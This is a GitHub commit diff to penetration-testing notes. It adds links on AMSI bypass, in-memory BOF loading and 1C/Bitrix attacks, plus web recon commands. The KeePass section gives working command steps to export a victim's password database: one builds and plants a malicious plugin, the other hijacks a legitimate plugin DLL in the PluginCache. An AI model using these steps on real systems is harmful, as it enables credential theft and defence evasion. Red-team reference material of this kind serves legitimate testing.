Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
snovvcrash committed Mar 17, 2023
1 parent b31c900 commit 984f80d
Show file tree
Hide file tree
Showing 5 changed files with 48 additions and 7 deletions.
8 changes: 8 additions & 0 deletions pentest/infrastructure/ad/av-edr-evasion/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -104,6 +104,14 @@ Note that we don't have to target the exact .NET Framework version when compilin



### BOFs with Python

- [https://github.com/rkbennett/pybof](https://github.com/rkbennett/pybof)
- [https://tishina.in/execution/python-inmemory-bof](https://tishina.in/execution/python-inmemory-bof)
- [https://github.com/zimnyaa/inmembof.py](https://github.com/zimnyaa/inmembof.py)




## Tools

Expand Down
8 changes: 1 addition & 7 deletions pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,6 +16,7 @@ description: Antimalware Scan Interface
* [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/)
* [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch)
* [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/)
* [https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md](https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md)

AMSI Test [Sample](https://gist.github.com/rasta-mouse/5cdf25b7d3daca5536773fdf998f2f08):

Expand Down Expand Up @@ -327,10 +328,3 @@ try {
...
```
{% endcode %}




## Tools

- [https://github.com/ZeroMemoryEx/Amsi-Killer](https://github.com/ZeroMemoryEx/Amsi-Killer)
21 changes: 21 additions & 0 deletions pentest/infrastructure/ad/credential-harvesting/keepass.md
Original file line number Diff line number Diff line change
Expand Up @@ -53,6 +53,27 @@ PS > (gc .\keepassxc_strings.txt).length / 1mb
- [https://github.com/d3lb3/KeeFarceReborn](https://github.com/d3lb3/KeeFarceReborn)


#### Abusing the KeePass Plugin Cache

- [https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html](https://blog.quarkslab.com/post-exploitation-abusing-the-keepass-plugin-cache.html)
- [https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin](https://github.com/d3lb3/KeeFarceReborn/tree/main/KeeFarceRebornPlugin)

Export DB by compiling and loading a malicious plugin (requires admin's privileges to place the `.plgx` file):

```
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
```

Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):

```
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
```



### KeePassHax

Expand Down
1 change: 1 addition & 0 deletions pentest/perimeter/1c.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@
- [https://habr.com/ru/post/352566/](https://habr.com/ru/post/352566/)
- [https://github.com/KraudSecurity/1C-Exploit-Kit](https://github.com/KraudSecurity/1C-Exploit-Kit)
- [https://www.rbsoft.ru/kb/upravlenie-spiskami-baz-1s/](https://www.rbsoft.ru/kb/upravlenie-spiskami-baz-1s/)
- [[PDF] Уязвимости и атаки на CMS Bitrix (by @crlf)](https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf)

Desktop clients' DB config is stored in `C:\Users\<USERNAME>\AppData\Roaming\1C\1CEStart\ibases.v8i`:

Expand Down
17 changes: 17 additions & 0 deletions pentest/web/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -184,6 +184,12 @@ $ nuclei -l domains.txt -t ssl -o nuclei-ssl.out
$ cat nuclei-ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mismatched-ssl -e self-signed -e weak-cipher | sort -u
```

Using [tlsx](https://github.com/projectdiscovery/tlsx/releases):

```
$ das -db corp parse https -raw | tlsx -ex -ss -mm -re -o tlsx.out
```



### httpx
Expand All @@ -193,3 +199,14 @@ $ cat nuclei-ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mi
```
$ httpx -l domains.txt -vhost -http2 -pipeline -title -content-length -status-code -follow-redirects -tls-probe -content-type -location -csp-probe -web-server -stats -ip -cname -cdn -ports 80,81,300,443,591,593,832,981,1010,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,12443,16080,18091,18092,20720,28017 -threads 300 -o httpx.out
```



### katana

- [https://github.com/projectdiscovery/katana](https://github.com/projectdiscovery/katana/releases)
- [https://github.com/CristiVlad25/scripts/blob/master/kata.sh](https://github.com/CristiVlad25/scripts/blob/master/kata.sh)

```
$ katana -u https://megacorp.com/ -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn | subjs | jsa.py | goverview probe -N -c 500 | sort -u -t';' -k2,14 | cut -d';' -f1
```

0 comments on commit 984f80d

Please sign in to comment.